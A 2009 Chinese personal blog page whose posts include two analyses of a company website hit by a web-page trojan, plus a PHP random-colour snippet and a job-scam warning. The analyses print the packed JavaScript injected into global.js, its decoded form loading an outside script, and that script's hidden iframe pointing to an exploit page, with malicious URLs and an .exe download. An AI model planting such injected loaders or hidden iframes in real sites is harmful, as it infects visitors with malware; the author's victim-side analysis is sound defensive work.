最近网站饱受煎熬,今天终于恢复正常

此文是标题党,在此鄙视以前空间的服务商,交钱买的空间不间断的出那么长时间的问题连个通知都没有,害的网站好几天不能访问,从现在开始,不鸟你了。

Pader 2009-5-14 0

挂马分析

上次的挂马找到最后无果,今天又随便一看发现少看了一个 iframe,然后经过重重查找发现了一个嵌入的网页下载了 http://o-ap.cn:1111/neww/as.css 这个CSS文件,下载下来之后用 Notepad2 打开发现全是乱马,有 39KB 的大小,我觉得它应该是一个可执行文件,机子上没有装杀毒软件我也不能断定,再经过查找发现了一段 StromPlayer 的字样,然后无意中上 360 的网站看了一下,发现 360 提示:"近期,网上传出暴风影音自带的ActiveX控件存在远程溢出漏洞",哇呀,还真厉害,难道就是利用暴风影音的漏洞?
经过一层一层的剥衣服,发现这个 http://klawesd.cn:6868/b174152/b17.htm 非常的厉害,用 iframe 一层一层的嵌了N多个网页,又引用了N多个JS文件,还有用到 Outlook Express 的漏洞,真的是经过精心的伪装,后面我也懒的去看了,总共算了一下估计嵌了有几十个网页加JS文件,非常的恐怖,多亏了畅游巡警.
在这里告诉大家,选一款适用的杀软和补漏洞至关重要

Pader 2009-5-5 0

PHP 产生随机颜色

搜集的两个,蛮好玩的...

PHP代码
  1. <?php   
  2.   
  3. function randColor() {   
  4.     $pattern = '1234567890ABCDEF';//字符池       
  5.     for($i=0;$i<6;$i++) {   
  6.         $color16x .= $pattern{mt_rand(0,15)};//生成php随机数    
  7.     }   
  8.     return '#'.$color16x;   
  9. }   
  10.   
  11. function rand_color(){      
  12.     for($a=0;$a<6;$a++){    //采用#FFFFFF方法,      
  13.         $d .= dechex(rand(0,15));//累加随机的数据--dechex()将十进制改为十六进制      
  14.     }      
  15.     return '#'.$d;      
  16. }     
  17.   
  18. $color = randColor();   
  19. $color2 = rand_color();   
  20. ?>   
  21. <center>   
  22. <font color="<?php echo $color; ?>" size="7"><?php echo $color; ?></font><br />   
  23. <font color="<?php echo $color2; ?>" size="7"><?php echo $color2; ?></font>   
  24. </center>   
Pader 2009-5-4 0

辞职了,怪事来了,大家求职时要提高警惕,提防骗子

辞职了,寻找新的 JOB 了...
今天上午有个什么电子公司打电话给我,一个女的,口吻非常专业,首先问我想在哪工作,然后把他们的网址给我,然后把他们的什么主管的号码给我,区号是0769,然后让我在上午几点到几点或下午几点到几点打那个主管的电话,我一看网站,哎哟,还真像个公司的样,主页是英文的,还有个一样的中文站,我一看,哇呀,好大的公司呀,可是很奇怪我从来没有投过这个公司的什么简历啊,他们的招聘岗位上没有网站美工和PHP程序员呀,我就怀疑了.
下午又有一个什么电子公司打电话给我,一个男的,情况跟上面的一样,也是留了个网址给我,一个区号0769的电话,一个什么主管,一样的时间叫我打电话过去,我一打开网站,哇呀,好大的公司,一个英文主站一个中文站,也不招网站方面的,我也没投过什么简历,我第一个反应就是:果然骗子,传销,嘿嘿,等下打电话过去看看他们到底搞什么鬼.
Pader 2009-5-4 0

公司网站被挂马

今天登录公司网站后台,超级巡警报警说有木马,郁闷,最近怎么这么倒霉,检查了一下发现是 global.js 文件被修改了,在底部加了代码如下:

JavaScript代码

  1. function goad(){var Then = new Date()    

  2. Then.setTime(Then.getTime() + 24*60*60*1000)   

  3. var cookieString = new String(document.cookie)   

  4. var cookieHeader = "Cookie1="    

  5. var beginPosition = cookieString.indexOf(cookieHeader)   

  6. if (beginPosition != -1){ } else { document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()   

  7. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.a(\'<6 7=3://9.0.1/5/8.4></6>\')',62,11,'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'.split('|'),0,{}));window.status="final";}}goad();   

 把 eval() 这一段拿出来解成正常格式

JavaScript代码

  1. eval(function(p, a, c, k, e, d) {   

  2.     e = function(c) {   

  3.         return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))   

  4.     };   

  5.     if (!''.replace(/^/, String)) {   

  6.         while (c--) d[e(c)] = k[c] || e(c);   

  7.         k = [function(e) {   

  8.             return d[e]   

  9.         }];   

  10.         e = function() {   

  11.             return '\\w+'  

  12.         };   

  13.         c = 1   

  14.     };   

  15.     while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b''g'), k[c]);   

  16.     return p   

  17. } ('2.a(\'<6 7=3://9.0.1/5/8.4></6>\')', 62, 11, 'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'.split('|'), 0, {}));   

  18. window.status = "final";   

  19. }   

  20. }   

  21. goad();  

看这一段
<6 7=3://9.0.1/5/8.4></6>
还有这一段
'chinaw3|com|document|http|js|s|script|src|ss|ufy9g1|writeln'
根据我自己猜想,它应该是按照数据排序把第一段里面的数字替换了,那么从 chinaw3 为 [0] 的开始依次替换数字就是
<script src=http://ufy9g1.chinaw3.com/s/ss.js></script>
原来是引用了站外的一个脚本文件 http://ufy9g1.chinaw3.com/s/ss.js
下载这个文件,内容是:

JavaScript代码

  1. document.writeln("<iframe width=100 height=0 src=http:\/\/klawesd.cn:6868\/b174152\/b17.htm><\/iframe>")   

  2. // A Popular Free Statistics Service for 200 000+ Webmasters.    

  3. var a1339tf="51la";var a1339pu="";var a1339pf="51la";var a1339su=window.location;var a1339sf=document.referrer;var a1339of="";var a1339op="";var a1339ops=1;var a1339ot=1;var a1339d=new Date();var a1339color="";if (navigator.appName=="Netscape"){a1339color=screen.pixelDepth;} else {a1339color=screen.colorDepth;}   

  4. try{a1339tf=top.document.referrer;}catch(e){}   

  5. try{a1339pu =window.parent.location;}catch(e){}   

  6. try{a1339pf=window.parent.document.referrer;}catch(e){}   

  7. try{a1339ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a1339ops=(a1339ops==null)?1: (parseInt(unescape((a1339ops)[2]))+1);var a1339oe =new Date();a1339oe.setTime(a1339oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a1339ops+ ";path=/;expires="+a1339oe.toGMTString();a1339ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a1339ot==null){a1339ot=1;}else{a1339ot=parseInt(unescape((a1339ot)[2])); a1339ot=(a1339ops==1)?(a1339ot+1):(a1339ot);}a1339oe.setTime(a1339oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a1339ot+";path=/;expires="+a1339oe.toGMTString();}catch(e){}   

  8. a1339of=a1339sf;if(a1339pf!=="51la"){a1339of=a1339pf;}if(a1339tf!=="51la"){a1339of=a1339tf;}a1339op=a1339pu;try{lainframe}catch(e){a1339op=a1339su;}document.write('<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=47&id=2481339&tpages='+a1339ops+'&ttimes='+a1339ot+'&tzone='+(0-a1339d.getTimezoneOffset()/60)+'&tcolor='+a1339color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a1339of)+'&vpage='+escape(a1339op)+'" />');   

  9. document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/866793\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/866793\/ystat.gif\"\/><\/a><\/noscript>");   

  10.   

  11. document.writeln("<a href=\"index.html\"><img src=\'http:\/\/phiex.vicp.net:8080\/count.asp?Referer=<%=Refer%>&Width=\"+escape(screen.width)+\"&Height=\"+escape(screen.height)+\"\' border=0 width=0 height=0><\/a>");   

结果发现里面嵌的全部都是统计,我郁闷,这个应该不会有木马啊,我再找,可是怎么找都找不到,看里面一个网页文件是: http://klawesd.cn:6868/b174152/b17.htm 上面的 b174152, 难道利用的是这个漏洞,现在我才感觉到及时补漏洞的重要性.另外在网上查了这个文件 http://ufy9g1.chinaw3.com/s/ss.js 网上说是下载了 http://yasws-05.cn/35/35.exe 些文件,下载下来之后,杀毒软件就报警了
难道就是这个sequence: Packed/Upack? 我太郁闷了,是怎么挂上去的呢?我得查查,毕竟偶不是搞黑客这块,真的很郁闷.

Pader 2009-5-4 0